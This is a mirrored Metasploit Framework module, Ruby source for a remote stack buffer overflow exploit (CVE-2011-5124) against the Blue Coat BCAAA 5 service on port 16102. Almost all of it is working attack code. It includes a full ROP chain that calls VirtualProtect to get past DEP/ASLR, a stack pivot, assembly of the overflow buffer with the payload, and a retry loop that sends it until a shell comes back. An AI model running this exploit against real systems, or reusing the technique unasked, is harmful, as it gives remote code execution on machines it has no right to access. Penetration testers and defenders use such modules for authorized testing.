Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bcaaa_bof.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),

18
          which comes as part of the Blue Coat Authentication proxy.  Please note that by default,

19
          this exploit will attempt up to three times in order to successfully gain remote code

20
          execution (in some cases, it takes as many as five times).  This can cause your activity

21
          to look even more suspicious.  To modify the number of exploit attempts, set the

22
          ATTEMPTS option.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Paul Harrington', # Initial discovery and PoC

27
          'Travis Warren',   # MSF Module with Universal DEP/ASLR bypass

28
          'sinn3r',          # More testing / reliability, plus minor changes

29
        ],

30
        'References' => [

31
          [ 'CVE', '2011-5124' ],

32
          [ 'OSVDB', '72095'],

33
          [ 'URL', 'https://kb.bluecoat.com/index?page=content&id=SA55' ],

34
          [ 'URL', 'https://seclists.org/bugtraq/2011/Jul/44' ]

35
        ],

36
        'Payload' => {

37
          'Space' => 936,

38
          'BadChars' => "\x00",

39
          'StackAdjustment' => -3500,

40
        },

41
        'Platform' => 'win',

42
        'Targets' => [

43
          [ 'BCAAA Version 5.4.6.1.54128', {} ],

44
        ],

45
        'Privileged' => false,

46
        'DisclosureDate' => '2011-04-04',

47
        'DefaultTarget' => 0,

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        Opt::RPORT(16102),

59
        OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),

60
      ]

61
    )

62
  end

63


64
  def junk

65
    return rand_text(4).unpack("L")[0].to_i

66
  end

67


68
  def exploit

69
    rop_gadgets = [

70
      # rop chain generated with mona.py

71
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

72
      0x7c37a140,  # Make EAX readable

73
      0x7c37591f,  # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)

74
      junk,        # EBP (filler)

75
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

76
      0x7c37a140,  # <- *&VirtualProtect()

77
      0x7c3530ea,  # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)

78
      0x7c346c0b,  # Slide, so next gadget would write to correct stack location

79
      0x7c376069,  # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)

80
      junk,        # EDI (filler)

81
      junk,        # will be patched at runtime (VP), then picked up into ESI

82
      junk,        # EBX (filler)

83
      0x7c376402,  # POP EBP # RETN (msvcr71.dll)

84
      0x7c345c30,  # ptr to 'push esp #  ret ' (from MSVCR71.dll)

85
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

86
      0xfffffdff,  # size 0x00000201 -> ebx, modify if needed

87
      0x7c351e05,  # NEG EAX # RETN (MSVCR71.dll)

88
      0x7c354901,  # POP EBX # RETN (MSVCR71.dll)

89
      0xffffffff,  # pop value into ebx

90
      0x7c345255,  # INC EBX # FPATAN # RETN (MSVCR71.dll)

91
      0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)

92
      0x7c34d201,  # POP ECX # RETN (MSVCR71.dll)

93
      0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)

94
      0x7c34b8d7,  # POP EDI # RETN (MSVCR71.dll)

95
      0x7c34b8d8,  # ROP NOP (-> edi)

96
      0x7c344f87,  # POP EDX # RETN (MSVCR71.dll)

97
      0xffffffc0,  # value to negate, target value : 0x00000040, target: edx

98
      0x7c351eb1,  # NEG EDX # RETN (MSVCR71.dll)

99
      0x7c346c0a,  # POP EAX # RETN (MSVCR71.dll)

100
      0x90909090,  # NOPS (-> eax)

101
      0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)

102
    ].pack("V*")

103


104
    pivot = [

105
      0x7C3410C4,  # RETN (MSVCR71.dll)

106
      0x1003800C,  # PUSH ESP; POP EBX; POP EBP; RETN (SmAgentAPI.dll)

107
      0x4241467D,  # EBP

108
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

109
      0x7C3417D2,  # SUB EAX,EAX; RETN (MSVCR71.dll)

110
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

111
      0x7C34f6C2,  # MOV EAX, EBX; POP EBX; RETN (MSVCR71.dll)

112
      junk,        # EBX

113
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

114
      0x5D02D0A0,  # SUB EBP,EAX; RETN (MSVCR70.dll)

115
      0x7C3C8937,  # XCHG EAX,EBP; RETN (MSVCP71.dll)

116
      0x7C3B5080,  # XCHG EAX,ESP; RETN (MSVCP71.dll)

117
    ].pack("V*")

118


119
    attempts = datastore['ATTEMPTS']

120


121
    # Sometimes a few attempts are needed to get a shell back (3 or 5 times)

122
    attempts.times do |i|

123
      # If we have a session on the box already, then we don't continue trying

124
      break if session_created?

125


126
      buffer = rand_text(8)

127
      buffer << rop_gadgets

128
      buffer << payload.encoded

129
      buffer << 'EBAB'

130
      buffer << rand_text(8)

131
      buffer << pivot

132


133
      connect

134
      print_status("Sending request to #{rhost}. Attempt ##{(i + 1).to_s}...")

135
      sock.put(buffer)

136
      handler

137
      select(nil, nil, nil, 2)

138
      disconnect

139
    end

140
  end

141
end

142


143